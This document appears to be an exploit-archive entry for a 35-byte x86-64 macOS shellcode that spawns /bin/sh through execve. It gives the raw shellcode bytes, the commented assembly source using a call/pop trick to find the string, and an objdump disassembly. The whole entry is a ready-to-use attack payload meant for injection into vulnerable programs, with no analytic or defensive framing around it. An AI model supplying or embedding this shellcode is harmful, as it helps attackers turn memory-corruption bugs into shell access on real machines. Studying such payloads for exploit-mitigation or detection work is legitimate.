Shellcode – Details| System call(s): | execve(“/bin//sh”, [“/bin//sh”], NULL) | | Size (char): | 35 | | Shellcode: | \x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68 |
Architecture| CPU maker: | Intel | | Architecture: | x86-64 | | OS details: | MacOS | | CPU details: | x86_64 |
|
------
.globl start
1: xor %rdx, %rdx # rdx = 0
mov $0x1fffff6, %rax # 0x200003b - 0x45 = 0x1FFFFF6
add $0x45, %rax # System call number 59 for execve
pop %rdi # pop ret address of "/bin//sh" in rdi
push %rdx # push null
push %rdi # push address of "/bin//sh"
mov %rsp, %rsi # rsi = pointer to stack
syscall # System call
start: call 1b # Call 1 backward, ret address will be "/bin//sh"
.ascii "/bin//sh" # Equivalent to /bin/sh
file format mach-o-x86-64
Disassembly of section .text:
0000000000001fdd :
1fdd: 48 31 d2 xor %rdx,%rdx
1fe0: 48 c7 c0 f6 ff ff 01 mov $0x1fffff6,%rax
1fe7: 48 83 c0 45 add $0x45,%rax
1feb: 5f pop %rdi
1fec: 52 push %rdx
1fed: 57 push %rdi
1fee: 48 89 e6 mov %rsp,%rsi
1ff1: 0f 05 syscall
0000000000001ff3 :
1ff3: e8 e5 ff ff ff callq 1fdd
1ff8: 2f (bad)
1ff9: 62 (bad)
1ffa: 69 .byte 0x69
1ffb: 6e outsb %ds:(%rsi),(%dx)
1ffc: 2f (bad)
1ffd: 2f (bad)
1ffe: 73 68 jae 2068